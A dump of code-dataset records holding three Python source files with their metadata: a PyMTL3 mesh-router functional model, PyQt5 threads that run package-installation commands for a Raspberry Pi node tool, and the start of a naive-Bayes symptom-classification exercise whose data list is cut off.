| 0
| false
| 0
| 0.005208
| 0
| 0.005208
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd5968245a3eaafdff5fd34a76206233d7bcf13b
| 5,214
|
py
|
Python
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/ocn-posh
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | 3
|
2019-06-07T13:27:06.000Z
|
2019-07-16T19:00:23.000Z
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/ocn-posh
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | 12
|
2019-07-23T02:29:31.000Z
|
2019-07-25T11:07:00.000Z
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/posh-ocn
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | null | null | null |
"""
==========================================================================
MeshRouteFL.py
==========================================================================
Functional level implementation of mesh router.
Author : Yanghui Ou
Date : July 3, 2019
"""
from pymtl3 import *
from .directions import *
#-------------------------------------------------------------------------
# MeshRouterFL
#-------------------------------------------------------------------------
# Mesh router that supports single flit packet.
class MeshRouterFL:
def __init__( s, pos_x, pos_y, dimension='y' ):
s.pos_x = pos_x
s.pos_y = pos_y
s.dimension = dimension
def arrange_src_pkts( s, lst ):
src_pkts = [ [] for _ in range(5) ]
if s.dimension == 'y':
for pkt in lst:
if pkt.src_x == s.pos_x and pkt.src_y == s.pos_y:
src_pkts[SELF].append( pkt )
elif pkt.src_x == s.pos_x:
if pkt.src_y < s.pos_y:
src_pkts[SOUTH].append( pkt )
else:
src_pkts[NORTH].append( pkt )
elif pkt.src_x < s.pos_x:
src_pkts[WEST].append( pkt )
else:
src_pkts[EAST].append( pkt )
else: # s.dimension == 'x'
for pkt in lst:
if pkt.src_x == s.pos_x and pkt.src_y == s.pos_y:
src_pkts[SELF].append( pkt )
elif pkt.src_y == s.pos_y:
if pkt.src_x < s.pos_x:
src_pkts[WEST].append( pkt )
else:
src_pkts[NORTH].append( pkt )
elif pkt.src_y < s.pos_y:
src_pkts[SOUTH].append( pkt )
else:
src_pkts[NORTH].append( pkt )
return src_pkts
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
if s.dimension == 'y':
for pkts in src_pkts:
for pkt in pkts:
dst = (
SELF if pkt.dst_x == s.pos_x and pkt.dst_y == s.pos_y else
NORTH if pkt.dst_y > s.pos_y else
SOUTH if pkt.dst_y < s.pos_y else
EAST if pkt.dst_x > s.pos_x else
WEST
)
dst_pkts[ dst ].append( pkt )
else: # s.dimension == 'x'
for pkts in src_pkts:
for pkt in pkts:
dst = (
SELF if pkt.dst_x == s.pos_x and pkt.dst_y == s.pos_y else
EAST if pkt.dst_x > s.pos_x else
WEST if pkt.dst_x < s.pos_x else
NORTH if pkt.dst_y > s.pos_y else
SOUTH
)
dst_pkts[ dst ].append( pkt )
return dst_pkts
#-------------------------------------------------------------------------
# MeshRouterMflitFL
#-------------------------------------------------------------------------
# Mesh router that supports single flit packet.
class MeshRouterMflitFL:
def __init__( s, Header, pos_x, pos_y, first_dimension='x' ):
s.Header = Header
s.pos_x = pos_x
s.pos_y = pos_y
s.first_dimension = first_dimension
def arrange_src_pkts( s, lst ):
src_pkts = [ [] for _ in range(5) ]
if s.first_dimension == 'y':
for pkt in lst:
header = s.Header.from_bits( pkt.flits[0] )
if header.src_x == s.pos_x and header.src_y == s.pos_y:
src_pkts[ SELF ].append( pkt )
elif header.src_x == s.pos_x:
if header.src_y < s.pos_y:
src_pkts[ SOUTH ].append( pkt )
else:
src_pkts[ NORTH ].append( pkt )
elif header.src_x < s.pos_x:
src_pkts[ WEST ].append( pkt )
else:
src_pkts[ EAST ].append( pkt )
elif s.first_dimension == 'x':
for pkt in lst:
header = s.Header.from_bits( pkt.flits[0] )
if header.src_x == s.pos_x and header.src_y == s.pos_y:
src_pkts[ SELF ].append( pkt )
elif header.src_y == s.pos_y:
if header.src_x < s.pos_x:
src_pkts[ WEST ].append( pkt )
else:
src_pkts[ NORTH ].append( pkt )
elif header.src_y < s.pos_y:
src_pkts[ SOUTH ].append( pkt )
else:
src_pkts[ NORTH ].append( pkt )
else:
assert False
return src_pkts
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
if s.first_dimension == 'y':
for pkts in src_pkts:
for pkt in pkts:
header = to_bitstruct( pkt.flits[0], s.Header )
dst = (
SELF if header.dst_x == s.pos_x and pkt.dst_y == s.pos_y else
NORTH if header.dst_y > s.pos_y else
SOUTH if header.dst_y < s.pos_y else
EAST if header.dst_x > s.pos_x else
WEST
)
dst_pkts[ dst ].append( pkt )
elif s.first_dimension == 'x':
for pkts in src_pkts:
for pkt in pkts:
header = s.Header.from_bits( pkt.flits[0] )
dst = (
SELF if header.dst_x == s.pos_x and header.dst_y == s.pos_y else
EAST if header.dst_x > s.pos_x else
WEST if header.dst_x < s.pos_x else
NORTH if header.dst_y > s.pos_y else
SOUTH
)
dst_pkts[ dst ].append( pkt )
else:
assert False
return dst_pkts
| 30.313953
| 77
| 0.494246
| 734
| 5,214
| 3.294278
| 0.089918
| 0.074442
| 0.04756
| 0.049628
| 0.864764
| 0.864764
| 0.848222
| 0.838296
| 0.765922
| 0.755997
| 0
| 0.004545
| 0.324895
| 5,214
| 171
| 78
| 30.491228
| 0.682386
| 0.13598
| 0
| 0.755725
| 0
| 0
| 0.001783
| 0
| 0
| 0
| 0
| 0
| 0.030534
| 1
| 0.045802
| false
| 0
| 0.015267
| 0
| 0.10687
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd6c1650b0d71c5b030b18d2e7e3232f343aecf9
| 9,856
|
py
|
Python
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 6
|
2020-09-06T16:43:06.000Z
|
2021-12-28T00:58:33.000Z
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 27
|
2020-08-10T15:18:29.000Z
|
2022-03-16T16:34:37.000Z
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 5
|
2020-08-10T14:33:27.000Z
|
2021-07-22T20:26:39.000Z
|
###############################################################################
# libraries
import sys, time, os, subprocess, os.path, shutil
from os import path
from PyQt5.QtWidgets import (
QApplication,
QWidget,
QMessageBox,
QProgressBar,
QPushButton,
QAction,
qApp
)
from PyQt5.QtCore import QThread, pyqtSignal
#from .helpers import os_parse
##############################################################################
#Thread for OS Update
class MyThread_os_update(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get full-upgrade -y && sudo apt-get autoremove -y \
&& sudo apt-get clean -y && sudo apt autoclean -y"), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for packages update
class MyThread_packages(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get install -y build-essential && \
sudo apt-get install -y git && sudo apt-get install -y snapd \
&& sudo snap install go --classic"), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.2
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
##############################################################################
#Thread for hornet update
class MyThread_hornet_update(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec service hornet stop \
&& sudo apt-get update && sudo apt-get -y upgrade hornet \
&& sudo systemctl restart hornet"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 5
while cnt <= 100:
cnt += 1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for hornet install
class MyThread_hornet_install(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(('pkexec apt-get update -y && sudo apt-get autoremove -y && sudo apt-get install -y build-essential \
&& sudo apt-get install -y git && sudo apt-get install -y snapd \
&& sudo snap install go --classic \
&& sudo apt-get install -y ufw && sudo ufw allow 15600/tcp && \
sudo ufw allow 14626/udp && sudo ufw limit openssh && \
sudo ufw enable && sudo apt-get install sshguard -y && sudo wget -qO - https://ppa.hornet.zone/pubkey.txt | sudo apt-key add - \
&& echo "deb http://ppa.hornet.zone stable main" | sudo tee -a /etc/apt/sources.list.d/hornet.list \
&& sudo apt-get update \
&& sudo apt-get install hornet && sudo systemctl enable hornet.service \
&& sudo service hornet start '), stdout=subprocess.PIPE, shell = True)
#&& sudo chown pi:pi /etc/apt/sources.list.d
#sudo mkdir /etc/apt/sources.list.d
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.4
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for hornet uninstall
class MyThread_hornet_uninstall(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get -qq purge hornet -y \
&& sudo rm -r /etc/apt/sources.list.d/hornet.list "), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 5
while cnt <= 100:
cnt += 5
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for nginx+certbot install
class MyThread_nginx_certbot_install(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y \
&& sudo apt-get -y upgrade && sudo apt-get install -y nginx \
&& sudo apt-get install -y ufw && sudo ufw allow 'Nginx Full' && sudo apt-get install -y apache2-utils \
&& sudo apt-get install software-properties-common -y && sudo apt-get update \
&& sudo apt-get install certbot python3-certbot-nginx -y \
"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for nginx+certbot uninstall
class MyThread_nginx_certbot_uninstall(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
if path.exists("/etc/nginx/") == True:
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get purge -y nginx nginx-common && sudo apt-get purge -y --auto-remove apache2-utils \
&& sudo apt-get -qq purge software-properties-common certbot python3-certbot-nginx -y \
&& sudo apt-get autoremove -y\
"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.5
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
else:
print("Nginx not installed")
| 39.741935
| 140
| 0.489955
| 1,028
| 9,856
| 4.64786
| 0.142023
| 0.04144
| 0.056509
| 0.049812
| 0.802846
| 0.753663
| 0.749267
| 0.732105
| 0.718292
| 0.695689
| 0
| 0.0173
| 0.343141
| 9,856
| 247
| 141
| 39.902834
| 0.720729
| 0.073965
| 0
| 0.727273
| 0
| 0.030303
| 0.038489
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035354
| false
| 0
| 0.020202
| 0
| 0.126263
| 0.146465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd77a30cb87f16804e0a7873ae7360be7220b0a1
| 14,275
|
py
|
Python
|
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
from sklearn.naive_bayes import GaussianNB
import pickle
# Dados
# Febre, Cansaço, Tosse, Espirro, Dores no Corpo, Corizando, Dor de Garganta, Diarreia, Dor de CAbeça, Falta de Ar
atributos = [
[1, 1, 0, 0, 0, 1, 1, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 0, 1, 1],
[0, 1, 1, 0, 1, 0, 1, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 1, 1, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 0, 1, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 1, 1, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 1, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 1],
[0, 1, 0, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1],
[0, 1, 1, 0, 1, 0, 1, 0, 1, 1],
[0, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 1, 0, 1, 1, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 1, 1, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 0, 0, 1, 0, 0, 1, 1, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 1, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 0, 0, 1, 0, 0, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 1, 1, 1, 1],
[1, 0, 0, 1, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 1, 0, 0, 0, 1, 1],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[1, 1, 1, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 1, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 1],
[1, 0, 0, 1, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
